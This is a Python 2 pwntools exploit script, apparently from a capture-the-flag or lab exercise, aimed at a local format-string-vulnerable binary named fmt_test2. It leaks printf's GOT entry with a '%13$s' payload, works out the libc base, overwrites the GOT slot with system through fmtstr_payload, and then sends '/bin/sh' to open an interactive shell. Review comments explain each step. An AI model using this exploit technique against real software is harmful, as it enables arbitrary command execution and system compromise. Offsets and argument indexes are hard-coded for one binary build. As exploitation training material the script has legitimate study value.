#! /usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

# Symbol offsets relative to the libc base for one specific libc build.
# Only offset_printf and offset_system are referenced below; the other six
# are defined but unused in this script.
# NOTE(review): these values are build-specific — confirm they match the
# libc that ./fmt_test2 actually loads before trusting the computed addresses.
offset___libc_start_main_ret = 0x18e81
offset_system = 0x0003cd10
offset_dup2 = 0x000e6110
offset_read = 0x000e5620
offset_write = 0x000e56f0
offset_str_bin_sh = 0x17b8cf
offset_puts = 0x00067360
offset_printf = 0x00050b60

# Debug logging shows every byte exchanged with the process, which is the
# quickest way to see when the leak comes back in an unexpected shape.
context.log_level = 'debug'

# Spawn the target locally and talk to it over its stdin/stdout.
p = process("./fmt_test2")


# Address of printf's GOT slot in the target (hard-coded, so the binary is
# presumably loaded at a fixed address — confirm it is not PIE).
printf_got = 0x0804a010
# Leak format string: "b" and "aa" are delimiters around the leaked bytes;
# "%13$s" prints the C string found at positional argument 13, which is meant
# to be the GOT address appended at the end of the payload.
# NOTE(review): the prefix "b%13$saa" is 8 bytes, so the appended address is
# two dwords past the start of the buffer; that is consistent with the buffer
# beginning at argument 11 (the offset passed to fmtstr_payload below), but
# the argument index is binary-specific — verify it.
leak_payload = "b%13$saa" + p32(printf_got)

p.sendline(leak_payload)

# Everything between the "b" marker and the "aa" marker is the content of
# the GOT slot, i.e. the runtime address of printf inside libc.
p.recvuntil("b")
info = p.recvuntil("aa")[:-2]
# Python 2 only: print statement and str.encode('hex').
print info.encode('hex')

# u32 expects exactly 4 bytes; because %s stops at the first NUL byte, the
# leak is shorter when the address contains 0x00 and this line then raises.
print_add = u32(info[:4])
libc_base = print_add - offset_printf
system_add = libc_base + offset_system

# Build a format string that writes system_add into printf's GOT slot,
# assuming the input buffer starts at positional argument 11.
# NOTE(review): a GOT overwrite presupposes the GOT is writable, i.e. the
# binary was not linked with Full RELRO — confirm with checksec.
payload = fmtstr_payload(11, {printf_got: system_add})

p.sendline(payload)
# After the overwrite, the next call through printf's GOT slot reaches
# system, so this line supplies the command string it will receive.
p.sendline('/bin/sh')
p.interactive()



